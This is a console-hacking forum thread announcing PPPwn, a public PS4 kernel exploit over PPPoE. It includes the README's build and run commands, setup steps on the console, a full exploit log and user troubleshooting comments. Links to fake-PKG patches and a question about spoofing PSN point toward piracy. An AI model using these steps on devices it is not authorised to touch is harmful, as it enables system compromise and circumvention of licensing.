Join Us and become a Member for a Verified Badge to access private areas with the latest PS4 / PS5 PKGs.
Category PS4 Jailbreaking       Thread starter Thread starter PSXHAX       Date / timeStart date Apr 30, 2024 at 2:26 PM       Replies 264      
Today TheOfficialFloW aka theflow0 decided to publish PPPwn ahead of his Remote Vulnerabilities in SPP talk on CVE-2006-4304 (FreeBSD.org) at TyphoonCon 2024 next month, which is the first PlayStation 4 PPPoE (Point-to-Point Protocol over Ethernet) RCE (Remote Code Execution) Kernel Exploit supporting PS4 Firmware versions up to 11.00 OFW with @KIWIDOGGIE aka kd_tech_ passing along some 11.00 Offsets (Orbis110.hpp) that can help in reverse-engineering payloads crediting developer @Al Azif (fw_defines.h / payloads_1100_and_below.zip - 46.3 KB - includes ps4-app-dumper.bin, ps4-disable-updates.bin, ps4-fan-threshold.bin, ps4-ftp.bin, ps4-module-dumper.bin, ps4-permanent-uart.bin and ps4-todex.bin via @zecoxao aka notnotzecoxao) stage2.bin (11.2 KB) and additional payloads (module_dumper.bin - 10.7 KB, permanent_uart.bin - 6.84 KB, pup_decrypter.bin - 16.8 KB, update_blocker.bin - 5.48 KB - rename to payload.bin and put on USB) and Enable Debug Menu Settings and FPKG patches (stage2_10.00.bin - 10.9 KB, stage2_10.01.bin - 10.9 KB, stage2_11.00.bin - 10.9 KB - rename file to stage2.bin and put in the stage2 folder) via @LightningMods aka LightningMods_ with Pull Requests for Ports spanning 7.00, 7.01, 7.02, 7.50, 7.51, 7.55, 8.00, 8.01, 8.03, 8.50, 8.52, 9.00, 9.03, 9.04, 9.50, 9.51, 9.60, 10.00, 10.01, 10.50, 10.70, 10.71 and 11.00. :love:

While PS5 Firmware versions up to 8.20 OFW were confirmed as vulnerable to CVE-2006-4304 by theflow0 previously, according to @CrazyVoid on Twitter, "what flow released is for PS4. the PS5 is different then PS4, it might not be able to be exploited the same way" with @SpecterDev elaborating on Twitter, "Since I've seen a lot of ppl asking about it, theflow's latest RCE won't easily be adapted to PS5. PS4 is much weaker in terms of mitigations which played a part in allowing a remote exploit w/o userland code execution. PS5 is different. SMAP+CFI make this much harder to do."

He went on to state via Twitter, "XOM also plays a role, even if CFI were a non-issue, you can't easily get gadgets to ROP with either. It might not be impossible but a new strategy would be needed and you'd need to go for R/W. You'd also likely need userland code exec. I wouldn't expect anything soon.."

Download PPPwn PS4 Payloads and Variants:
Spoiler: Depreciated

:arrow: Additional PlayStation 4 Homebrew / Payload Updates for 11.00 PS4 Firmware:
Here's further details from the PPPwn README.md: PPPwn - PlayStation 4 PPPoE RCE

PPPwn is a kernel remote code execution exploit for PlayStation 4 upto FW 11.00. This is a proof-of-concept exploit for CVE-2006-4304 that was reported responsibly to PlayStation.

Supported versions are:
  • FW 7.00 / 7.01 / 7.02
  • FW 7.50 / 7.51 / 7.55
  • FW 8.00 / 8.01 / 8.03
  • FW 8.50 / 8.52
  • FW 9.00
  • FW 9.03 / 9.04
  • FW 9.50 / 9.51 / 9.60
  • FW 10.00 / 10.01
  • FW 10.50 / 10.70 / 10.71
  • FW 11.00
  • more can be added (PRs are welcome)
The exploit only prints PPPwned on your PS4 as a proof-of-concept. In order to launch Mira or similar homebrew enablers, the stage2.bin payload needs to be adapted.

Requirements
  • Computer with Ethernet port
    • USB adapter also works
  • Ethernet cable
  • Linux
    • You can use VirtualBox to create a Linux VM with Bridged Adapter as network adapter to use the ethernet port in the VM.
  • Python3 and gcc installed
Usage

On your computer, clone the repository:
Code:
git clone --recursive https://github.com/TheOfficialFloW/PPPwn
Change the directory to the cloned repository:
Code:
cd PPPwn
Install the requirements:
Code:
sudo pip install -r requirements.txt
Compile the payloads:
Code:
make -C stage1 FW=1100 clean && make -C stage1 FW=1100
make -C stage2 FW=1100 clean && make -C stage2 FW=1100
For other firmwares, e.g. FW 9.00, pass FW=900.

DO NOT RUN the exploit just yet (don't press Enter yet) but prepare this command on your prompt (see ifconfig for the correct interface):
Code:
sudo python3 pppwn.py --interface=enp0s3 --fw=1100
For other firmwares, e.g. FW 9.00, pass --fw=900.

On your PS4:
  • Go to Settings and then Network
  • Select Set Up Internet connection and choose Use a LAN Cable
  • Choose Custom setup and choose PPPoE for IP Address Settings
  • Enter anything for PPPoE User ID and PPPoE Pasword
  • Choose Automatic for DNS Settings and MTU Settings
  • Choose Do Not Use for Proxy Server
  • Now, simultaneously press the 'X' button on your controller on Test Internet Connection and 'Enter' on your keyboard (on the computer you have your Python script ready to run).
ALWAYS wait for the console to show the message "Cannot connect to network: (NW-31274-7)" before trying this PPPOE injection again.

If the exploit fails or the PS4 crashes, you can skip the internet setup and simply click on Test Internet Connection. Kill the pppwn.py script and run it again on your computer, and then click on Test Internet Connection on your PS4: always simultaneously.

If the exploit works, you should see an output similar to below, and you should see Cannot connect to network. followed by PPPwned printed on your PS4, or the other way around.

If the exploit works, you should see an output similar to below, and you should see Cannot connect to network. followed by PPPwned printed on your PS4.

Example run
Code:
[+] PPPwn - PlayStation 4 PPPoE RCE by theflow
[+] args: interface=enp0s3 fw=1100 stage1=stage1/stage1.bin stage2=stage2/stage2.bin

[+] STAGE 0: Initialization
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634beba00
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] Source MAC: 07:ba:be:34:d6:ab
[+] AC cookie length: 0x4e0
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[*] Waiting for interface to be ready...
[+] Target IPv6: fe80::2d9:d1ff:febc:83e4
[+] Heap grooming...done

[+] STAGE 1: Memory corruption
[+] Pinning to CPU 0...done
[*] Sending malicious LCP configure request...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[+] Scanning for corrupted object...found fe80::0fdf:4141:4141:4141

[+] STAGE 2: KASLR defeat
[*] Defeating KASLR...
[+] pppoe_softc_list: 0xffffffff884de578
[+] kaslr_offset: 0x3ffc000

[+] STAGE 3: Remote code execution
[*] Sending LCP terminate request...
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634beba00
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] Source MAC: 97:df:ea:86:ff:ff
[+] AC cookie length: 0x511
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Triggering code execution...
[*] Waiting for stage1 to resume...
[*] Sending PADT...
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634be9200
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] AC cookie length: 0x0
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...

[+] STAGE 4: Arbitrary payload execution
[*] Sending stage2 payload...
[+] Done!
Notes for Mac Apple Silicon Users (arm64 / aarch64)

The code will not compile on Apple Silicon and requires amd64 architecture. There is a workaround using docker which will build the bin files required. Clone this repository to your mac system, then from the repo folder run ./build-macarm.sh. This will build the binaries for PS4 FW 1100 and place the necessary files into the correct folders.

To build the binaries for a different version, i.e. 900, run the command as such: ./build-macarm.sh 900. Once built, copy this folder structure into the Linux VM and execute as instructed above.This has been tested using VMware Fusion 13.5.1, with the VM Guest as Ubuntu 24.04, and the host machine is MacOS 14.4.1

Notes for GoldHEN version

This loader only supports payloads with a kernel entrypoint. The custom version of stage2 first looks for the payload in the root directory of the USB drive, and if found, it is copied to the internal HDD at this path: /data/GoldHEN/payloads/goldhen.bin. The internal payload is then loaded and is no longer needed on the external USB drive. At the moment, only firmware versions 9.00, 10.00, 10.01 and 11.00 are supported. Other versions like 9.60 will also be supported.

Reminder: All GoldHEN related issues, updates, etc go in the ongoing discussion topic for it:
Spoiler: Related Tweets, Videos, Opcode Offsets & ROPGadget Gadgets
PPPwn PlayStation 4 PPPoE RCE PS4 Kernel Exploit to 11.00 by TheOfficialFloW.jpg
 

Comments

I recently got back in to playing my PS4 and had previously tried the old jailbreak from years ago, but after not having the console on for literally years I was glad to see that I left it on a suitable firmware (v9.00) so I have been happily using the new jailbreak method for a couple of weeks now of that console.

I've even sent off for one of those plug and play ethernet devices so just waiting for it to arrive, at the moment I'm using my LG TV to run the jailbreak.

A few days ago I bought a PS4 Pro cheap just hoping it would be on 11 or lower, but sadly it's on 11.03, still it will be waiting for me once a jailbreak comes for 11+ and I have the 'normal' PS4 till then. (y)
 
I am on FW 10.00, and I was able to use the pppwn.exe version, but I had a bit of an oddity. I kept getting a failure fairly quickly on the PS4 side that said 'A DNS Server cannot be used' around the time the heap grooming was starting on the exploit side. I rebooted everything. No dice.

On a whim, I tried a different ethernet cable, and everything worked on the next try. I've tested the 'bad cable' and it seems great elsewhere, but something about it didn't work for PPPwn. Hopefully if someone else gets the same error, they find this.
 
I had this issue too on the first try! Tested with one (working) ethernet cable with no luck... tried another one and got it working in a couple of seconds.

Then i checked the cable itself with a RJ45 cable tester, and i noticed that the first cable was in fact a CAT5e with only 2 twisted pair (those cables are elsewhere perfectly functional, but only allow 100mbps speed to be negotiated).

Dunno if it's related to the issue, but I manually crimped 2 more cables just for curiosity and the test seems to be confirming my hypothesis...

Anyway, got it working with a short, good CAT6 cable and a Luckfox Pico, extremely convenient as you can leave it attached to the console, and it turns itself off automatically after the JB.

The last issue was how to properly shutdown the console, (the JB sometimes leaves the console pretty stucked when you turn it off).... well, turns out today that the only thing you need to do is to disable internet connection (y)(y)
 
This is incredible, nice and easy to follow and I thought I hit a dead end when I found that PC emulation isn't great yet.

I see a lot of people reporting switching the ethernet cable when it fails, but I find it doesn't work every execution anyway. If it works 50% of the time, it's not the ethernet switching that did it, idk if that's the case for everyone but I'm pointing it out to maybe save someone a step, try again, try again, restart, try again.
 
This exploit is AMAZING! The moment I heard about it, I dusted off my old PS4, formatted my Raspberry Pi's SD card, and cloned the Pi-PWN repo that @stooged made. From there, it was smooth sailing, and I’ve been diving deeper into this fascinating scene ever since. Gotta admit, though, it was a bit nerve-wracking injecting prebuilt binaries from sources I wasn’t familiar with… but all in the name of tinkering, right? 😅

I wanted to share something useful in my first post, so here’s a random tidbit that might help someone out there:

I noticed some folks out there were having trouble setting up an FTP connection with the PPoE NAT implementation of the Pi-PWN repo. The issue might be that they didn’t catch @stooged's note in the README.md to set the FTP client to “Active” mode instead of “Passive” mode. Especially if they’re using FileZilla, they might not realize what the issue is as it won't log anything useful when things go wrong. On top of that, by default, FileZilla doesn’t fall back to active mode after the initial FTP handshake, which can cause headaches.

A potential fix is enabling a Linux kernel module that is a nftables helper which rewrites FTP protocol messages (like the PASV message from the GoldHen FTP server) between the client and server behind a NAT: `nf_nat_ftp`. Just add `sudo modprobe nf_nat_ftp` in `pppoe.sh`, and Active mode FTP should work just fine from that point onwards.

Sidenote: I always assumed kernel modules like the one mentioned above were autoloaded, but apparently that does not seem to be the case for `nf_nat_ftp`, although other (i.e. `nf_conntrack_nat`) are autoloaded. I have no clue why that is, so if any people knowledgeable about the Linux Kenel autoload subsystem are reading this, would love to know your thoughts on this! :)

Anyways, really excited to join this community, learn more about the fundamentals of the FreeBSD-based PS4 kernel and (hopefully!) eventually contribute and build cool stuff together with you guys!
 
I'm new to the PS4 scene, but recently acquired a PS4 slim (11.00) and decided to give it a whirl. Wiped it, formatted a new 1tb SSD that's attached through USB, used the PPPwn exploit (PC based tool) which worked amazingly well. I haven't ran into any issues really, PKG installation is pretty straight forward.

I am wondering though if there is a PSN spoof for 11.00 that will let me login to my PSN account somehow just so I'm not running a generic profile. As updating isn't an option if I want to keep it pwn'd is there a way to spoof PSN using a router or PC somehow? Thanks
 
I recently jailbroke my 11.0 Slim PS4 with the Luckfox Pico, very easy method but I'm having a big problem: My save files are being deleted without any reason, I already lost 2 saves from different games, so the PKG isn't the problem.

Anyone has any suggestion of what I can do? I'm thinking about saving with Apollo to USB Drive, but Apollo is very confusing to use :o
 
I'm looking for a MALE AUX ps4 connector, there is a way to get one?

@bowura I had the same problem but I associate it with the fact that the console went into kernel panic twice in a row and having an hdd the data can be corrupted more easily
 
For the previous post - I will try and find the german one I used if I still have the email. Radio Shack might of had it.

Concening PPPwn and Luckfox I have been using a Luckfox to jailbreak my 2 PS4 Pros, one on 9.00 and the other on 11.00.

They both share the same problem. Neither system likes to reboot from rest mode (I unplug my luckfox when in Rest Mode) and sometimes when I just click my PS4 controller it might turn on. What usually happens is either PS4 wont boot clean or enter true rest mode or sometimes shut down. When I shutdown the PS4 it sometimes has the need to repair message at startup (I changed the HDMI cable to fix the boot problem but now it is back.

When either boots it needs to repair the PS4 and external storage. The PPPwn jailbreaks the PS4s. It is the next startup that is the issue.

Any suggestions would be appreciated. Thank you
 
Back
Top